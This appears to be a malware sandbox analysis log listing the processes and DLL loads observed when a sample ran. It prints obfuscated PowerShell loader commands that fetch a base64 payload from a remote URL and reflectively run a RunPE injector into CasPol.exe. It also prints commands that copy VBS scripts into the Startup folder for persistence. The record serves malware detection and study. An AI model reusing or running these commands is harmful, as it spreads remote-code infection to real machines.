Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
